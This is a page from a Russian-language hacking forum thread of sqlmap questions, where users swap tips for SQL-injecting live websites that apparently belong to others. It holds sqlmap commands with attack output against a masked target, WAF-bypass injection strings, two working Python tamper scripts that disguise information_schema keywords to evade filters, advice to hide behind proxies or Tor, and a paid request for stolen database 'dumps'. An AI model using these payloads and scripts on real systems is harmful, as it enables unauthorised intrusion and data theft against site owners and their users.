Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    90
    Likes Received:
    68
    Reputations:
    3
    Руками посмотри стринг, который выдается при true, и выбери (s) вбив его. А вообще все верно выше написали, запускай с параметром --dbs и на этом этапе просто (C) каждый раз. У тебя параметр email= пустой, заполни его чем то изначально, [email protected] например, не чекай с пустыми параметрами.
     
  2. m0nkrus

    m0nkrus New Member

    Joined:
    12 Feb 2019
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
  3. m0nkrus

    m0nkrus New Member

    Joined:
    12 Feb 2019
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    слепая SQL была(((
     
  4. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    406
    Likes Received:
    37
    Reputations:
    1
  5. m0nkrus

    m0nkrus New Member

    Joined:
    12 Feb 2019
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
  6. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    153
    Likes Received:
    38
    Reputations:
    1
  7. EricZ

    EricZ New Member

    Joined:
    21 Oct 2017
    Messages:
    30
    Likes Received:
    2
    Reputations:
    0
    Срочно ищу помощника (ру), требуются дампы

    Оплата достойная


    Telegram
    S_O_Group
     
    #887 EricZ, 8 Mar 2019
    Last edited: 8 Mar 2019
  8. EricZ

    EricZ New Member

    Joined:
    21 Oct 2017
    Messages:
    30
    Likes Received:
    2
    Reputations:
    0
    всем привет
    помогите плз разобраться

    sqlmap --url "https://www.******.com/***/****/*******/********a-100-ml.html?query=query+AND+1=1+--+" --dbs --random-agent --technique=BEUQ --tamper=space2comment.py --level=3 --risk=3
    ___
    __H__
    ___ ___[']_____ ___ ___ {1.3.2#stable}
    |_ -| . ["] | .'| . |
    |___|_ [.]_|_|_|__,| _|
    |_|V... |_| http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting @ 20:41:22 /2019-03-12/

    [20:41:22] [INFO] loading tamper module 'space2comment'
    [20:41:22] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11' from file '/usr/share/sqlmap/txt/user-agents.txt'
    [20:41:22] [WARNING] it appears that you have provided tainted parameter values ('query=query AND 1%3D1 -- ') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
    are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
    [20:41:29] [INFO] testing connection to the target URL
    [20:41:44] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
    [20:41:44] [INFO] checking if the target is protected by some kind of WAF/IPS
    [20:41:51] [INFO] testing if the target URL content is stable
    [20:41:55] [INFO] target URL content is stable
    [20:41:55] [INFO] testing if GET parameter 'query' is dynamic
    [20:42:02] [WARNING] GET parameter 'query' does not appear to be dynamic
    [20:42:52] [WARNING] heuristic (basic) test shows that GET parameter 'query' might not be injectable
    [20:43:00] [INFO] testing for SQL injection on GET parameter 'query'
    [20:43:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [20:43:23] [WARNING] turning off pre-connect mechanism because of connection reset(s)
    [20:43:23] [WARNING] there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests
    [20:43:23] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)


    так понимаю надо темперы подбирать и time-sec увеличивать?
     
    #888 EricZ, 12 Mar 2019
    Last edited: 12 Mar 2019
  9. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    226
    Likes Received:
    105
    Reputations:
    1
    По пробуй вот так https://www.******.com/***/****/*******/********a-100-ml.html?query=*"
    + подрубай прокси или Tor
     
    #889 karkajoi, 12 Mar 2019
    Last edited: 13 Mar 2019
  10. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    56
    Likes Received:
    22
    Reputations:
    7
    Подкиньте название тампера для инжекта такого вида: target.com/index.php?id=4668' /*!50000uNiOn*/ /*!50000sElEcT*/ 'here', 1-- -.
    Руками раскрутить проблемы нет, но не знаю как мапу скормить
     
  11. BillyBons

    BillyBons Active Member

    Joined:
    1 Dec 2016
    Messages:
    223
    Likes Received:
    111
    Reputations:
    13
    Навскидку нет,, посмотрите тут - https://0xd0m7.blogspot.com/2016/02/understanding-tamper-option-in-sqlmap-ii.html
    или воспользуйтесь этим - https://www.kitploit.com/2018/10/atlas-quick-sqlmap-tamper-suggester.html
     
  12. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    9
    Likes Received:
    5
    Reputations:
    3
    В tamper/versionedkeywords.py где /*!%s*/ поменять на своё значение /*!12345%s*/
    и использовать randomcase
    --tamper=randomcase,versionedkeywords
     
    #892 hibar1Xs, 18 Mar 2019
    Last edited: 18 Mar 2019
    BenderMR likes this.
  13. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    56
    Likes Received:
    22
    Reputations:
    7
    Спасибо, то что нужно. А как расширить данный функционал для /*!50000information_schema*/.tables etc. Пробовал переписать немного этот тампер, но не вышло.
    Может есть кто то делал подобные тамперы под informatio_schema?
     
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,446
    Likes Received:
    763
    Reputations:
    834
    Создаешь в папке с тампером новый файл, как пример:
    Code:
    #!/usr/bin/env python
    
    """
    Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
    See the file 'doc/COPYING' for copying permission
    """
    
    from lib.core.enums import PRIORITY
    
    __priority__ = PRIORITY.HIGHEST
    
    def dependencies():
        pass
    
    def tamper(payload, **kwargs):
        """
        Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
    
        Requirement:
            * MySQL
    
        Tested against:
            * MySQL 5.0
    
        Notes:
            * Useful to bypass very weak and bespoke web application firewalls
              that filter the CONCAT() function
    
        >>> tamper('CONCAT(1,2)')
        'CONCAT_WS(MID(CHAR(0),0,0),1,2)'%73CHEMA
        """
    
        if payload:
            payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")
            payload = payload.replace("table_schema", "/*!12345%74able_schema*/")
            payload = payload.replace("table_name", "/*!12345%74able_name*/")
            payload = payload.replace("SCHEMA", "%73CHEMA")   
            payload = payload.replace("schema", "%73chema")       
    
        return payload
    и играешься как хочешь, с нужными функциями
     
    _________________________
    BenderMR and BillyBons like this.
  15. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    9
    Likes Received:
    5
    Reputations:
    3
    В repStr перечислять нужное через "|" (регистр неважен) и экранировать спец. символы :
    Code:
    #!/usr/bin/env python
    
    import re
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.HIGHER
    
    def tamper(payload, **kwargs):
    
        def process(match):
            word = match.group('word')
            return match.group().replace(word, "/*!12345%s*/" % word)
    
        retVal = payload
        if payload:
            repStr = "table_name|information_schema"
            retVal = re.sub(r"(?P<word>" + repStr + ")", lambda match: process(match), retVal,flags=re.IGNORECASE)
    
        return retVal
     
    #895 hibar1Xs, 19 Mar 2019
    Last edited: 19 Mar 2019
    BenderMR likes this.
  16. MrBa

    MrBa New Member

    Joined:
    10 Jan 2017
    Messages:
    12
    Likes Received:
    3
    Reputations:
    0
    Доброго здоровья всем форумчанам!
    Начал более глубоко вникать в построение запросов. За основу взял sqlmap. Опишу две ситуации которые мне не удалось никак для себя объяснить.
    Ситуация 1
    Есть некий сайт, который я раскрутил руками с помощью UNION и получил имя текущей БД. Дальше двигаться не стал. Никакого WAV там нет, тестил whatwav. Ну и вручную всё вошло без лишних вопросов. Заряжаю в sqlmap, --technique=U. В итоге, sqlmap крутил-крутил, потом сказал «ой, всё!» и выдал, что слишком много ошибок 404 и сослался на WAF. WTF?

    Ситуация 2
    Сайт полностью раскручен sqlmap и снова --technique=U. В данный момент вникаю именно в эту технику. Получаю список БД. Там же, в конце процесса sqlmap выдает готовый payload с помощью которого он получил результат. Я понимаю sql и мне всё понятно. Беру этот payload, вставляю в броузер. В итоге выдаёт ошибку синтаксиса. Почему?
    Буду благодарен любой помощи в решении этих проблем.
     
  17. MrBa

    MrBa New Member

    Joined:
    10 Jan 2017
    Messages:
    12
    Likes Received:
    3
    Reputations:
    0
    Попробуйте утилиту whatwav. Она определяет тип WAF и тампер(ы), который нужно использовать. Но это не факт. Попробуйте руками. Здесь на борде есть статьи как обходить WAV
     
    noj likes this.
  18. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    56
    Likes Received:
    22
    Reputations:
    7
    Джентельмены, реально ли через sqlmap обновить поле в колонке читая текст из filename.txt используя --sql-shell?
    Что то типа UPDATE tablename SET textcolumn= filename.txt WHERE id=1?
    P.S есть ли вообще такая возможность, чтобы текст со своего файла туда залить и как такой запрос должен выглядить
     
  19. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    9
    Likes Received:
    5
    Reputations:
    3
    Если SELECT, то обновить можно при условии запроса в бд через mysqli_multi_query или PDO::query. Или тип бд mssql.
    Если INSERT, то можно обновить поле при наличии PRIMARY KEY в таблице.
    https://dev.mysql.com/doc/refman/8.0/en/insert-on-duplicate.html

    В SET textcolumn = 'содержимое filename.txt'
     
    #899 hibar1Xs, 22 Mar 2019
    Last edited: 22 Mar 2019
  20. hibar1Xs

    hibar1Xs Member

    Joined:
    30 Jan 2019
    Messages:
    9
    Likes Received:
    5
    Reputations:
    3
    sqlmap генерирует свой префикс и суффикс. Если использовался при раскрутке, то укзать через --prefix --suffix.
    https://github.com/sqlmapproject/sqlmap/wiki/Usage
     
    MrBa likes this.
Loading...